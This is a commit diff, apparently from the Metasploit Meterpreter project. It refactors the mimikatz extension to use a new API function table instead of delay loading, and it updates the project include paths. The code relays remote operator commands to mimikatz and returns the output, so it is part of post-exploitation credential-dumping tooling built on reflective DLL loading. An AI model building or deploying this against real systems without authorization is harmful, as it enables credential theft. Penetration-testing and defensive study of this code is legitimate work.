Remove delay loading from mimikatz

2025-01-02 11:36:22 +01:00 · 2020-04-17 19:55:02 +10:00 · 2020-04-17 19:55:02 +10:00 · f4f6bb01d8
commit f4f6bb01d8
parent 472a6b1f9e
2 changed files with 107 additions and 109 deletions
--- a/c/meterpreter/source/extensions/mimikatz/main.cpp
+++ b/c/meterpreter/source/extensions/mimikatz/main.cpp
@ -14,120 +14,118 @@ std::wstring s2ws(const std::string& str)
    return wstrTo;
 }

-extern "C" 
+extern "C"
 {
-#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
-// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
-// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the 
-// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
+#include "common_metapi.h"
+
+	// Required so that use of the API works.
+	MetApi* met_api = NULL;
+
 #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"

-// this sets the delay load hook function, see DelayLoadMetSrv.h
-EnableDelayLoadMetSrv();
+	mimikatz* myMimiKatz;

-mimikatz * myMimiKatz;
-
-// Singleton
-void initialize_mimikatz()
-{
-	vector<wstring> *args;
-	if (!myMimiKatz)
+	// Singleton
+	void initialize_mimikatz()
 	{
-		args = new vector<wstring>();
-		myMimiKatz = new mimikatz(args);
-		delete args;
-	}
-}
-
-void clear_buffer()
-{
-	oss.str(L""); 
-	oss.clear();
-}
-
-wchar_t* convert_wstring_to_wchar_t(wstring in)
-{ 
-	const wchar_t* outputStr = in.c_str(); 
-	wchar_t* out = new wchar_t[in.size()+1]; 
-	wcscpy_s(out, in.size() + 1, outputStr); 
-	out[in.size()] = '\0';
-	return out;
-}
-
-DWORD request_custom_command(Remote *remote, Packet *packet)
-{
-	Packet * response = packet_create_response(packet);
-	Tlv argTlv             = {0};
-	DWORD index            = 0;
-	vector<wstring> args;
-
-	LPCSTR func = packet_get_tlv_value_string(packet, TLV_TYPE_MIMIKATZ_FUNCTION);
-	dprintf("Function: %s", packet_get_tlv_value_string(packet, TLV_TYPE_MIMIKATZ_FUNCTION));
-	wstring function = s2ws(func);
-
-	while( packet_enum_tlv( packet, index++, TLV_TYPE_MIMIKATZ_ARGUMENT, &argTlv ) == ERROR_SUCCESS )
-	{
-		dprintf("Arg: %s", (PCHAR)argTlv.buffer);
-		args.push_back(s2ws((PCHAR)argTlv.buffer));
+		vector<wstring>* args;
+		if (!myMimiKatz)
+		{
+			args = new vector<wstring>();
+			myMimiKatz = new mimikatz(args);
+			delete args;
+		}
 	}

-	clear_buffer();
+	void clear_buffer()
+	{
+		oss.str(L"");
+		oss.clear();
+	}

-	initialize_mimikatz();
-	myMimiKatz->doCommandeLocale(&function, &args);
+	wchar_t* convert_wstring_to_wchar_t(wstring in)
+	{
+		const wchar_t* outputStr = in.c_str();
+		wchar_t* out = new wchar_t[in.size() + 1];
+		wcscpy_s(out, in.size() + 1, outputStr);
+		out[in.size()] = '\0';
+		return out;
+	}

-	wchar_t* output = convert_wstring_to_wchar_t(oss.str());
-	
-	clear_buffer();
+	DWORD request_custom_command(Remote* remote, Packet* packet)
+	{
+		Packet* response = met_api->packet.create_response(packet);
+		Tlv argTlv = { 0 };
+		DWORD index = 0;
+		vector<wstring> args;

-	packet_add_tlv_raw(response, TLV_TYPE_MIMIKATZ_RESULT, output, (DWORD)(wcslen(output)*sizeof(wchar_t)));
-	packet_transmit_response(ERROR_SUCCESS, remote, response);
-
-	return ERROR_SUCCESS;	
-}
-
-Command customCommands[] =
-{
-	COMMAND_REQ( "mimikatz_custom_command", request_custom_command ),
-	COMMAND_TERMINATOR
-};
-
-/*!
- * @brief Initialize the server extension.
- * @param remote Pointer to the remote instance.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
-{
-	hMetSrv = remote->met_srv;
-
-	command_register_all( customCommands );
-
-	return ERROR_SUCCESS;
-}
-
-/*!
- * @brief Deinitialize the server extension.
- * @param remote Pointer to the remote instance.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
-{
-	command_deregister_all( customCommands );
-
-	return ERROR_SUCCESS;
-}
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "mimikatz", bufferSize - 1);
-	return ERROR_SUCCESS;
-}
+		LPCSTR func = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_MIMIKATZ_FUNCTION);
+		dprintf("Function: %s", met_api->packet.get_tlv_value_string(packet, TLV_TYPE_MIMIKATZ_FUNCTION));
+		wstring function = s2ws(func);

+		while (met_api->packet.enum_tlv(packet, index++, TLV_TYPE_MIMIKATZ_ARGUMENT, &argTlv) == ERROR_SUCCESS)
+		{
+			dprintf("Arg: %s", (PCHAR)argTlv.buffer);
+			args.push_back(s2ws((PCHAR)argTlv.buffer));
+		}
+
+		clear_buffer();
+
+		initialize_mimikatz();
+		myMimiKatz->doCommandeLocale(&function, &args);
+
+		wchar_t* output = convert_wstring_to_wchar_t(oss.str());
+
+		clear_buffer();
+
+		met_api->packet.add_tlv_raw(response, TLV_TYPE_MIMIKATZ_RESULT, output, (DWORD)(wcslen(output) * sizeof(wchar_t)));
+		met_api->packet.transmit_response(ERROR_SUCCESS, remote, response);
+
+		return ERROR_SUCCESS;
+	}
+
+	Command customCommands[] =
+	{
+		COMMAND_REQ("mimikatz_custom_command", request_custom_command),
+		COMMAND_TERMINATOR
+	};
+
+	/*!
+	 * @brief Initialize the server extension.
+	 * @param api Pointer to the Meterpreter API structure.
+	 * @param remote Pointer to the remote instance.
+	 * @return Indication of success or failure.
+	 */
+	DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote* remote)
+	{
+		met_api = api;
+
+		met_api->command.register_all(customCommands);
+
+		return ERROR_SUCCESS;
+	}
+
+	/*!
+	 * @brief Deinitialize the server extension.
+	 * @param remote Pointer to the remote instance.
+	 * @return Indication of success or failure.
+	 */
+	DWORD __declspec(dllexport) DeinitServerExtension(Remote* remote)
+	{
+		met_api->command.deregister_all(customCommands);
+
+		return ERROR_SUCCESS;
+	}
+
+	/*!
+	 * @brief Get the name of the extension.
+	 * @param buffer Pointer to the buffer to write the name to.
+	 * @param bufferSize Size of the \c buffer parameter.
+	 * @return Indication of success or failure.
+	 */
+	DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
+	{
+		strncpy_s(buffer, bufferSize, "mimikatz", bufferSize - 1);
+		return ERROR_SUCCESS;
+	}
 }
--- a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj
+++ b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj
@ -105,7 +105,7 @@
    <ClCompile>
      <Optimization>MinSpace</Optimization>
      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -155,7 +155,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
    <ClCompile>
      <Optimization>MinSpace</Optimization>
      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -208,7 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
    <ClCompile>
      <Optimization>MinSpace</Optimization>
      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -262,7 +262,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
    <ClCompile>
      <Optimization>MinSpace</Optimization>
      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_MIMIKATZ_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>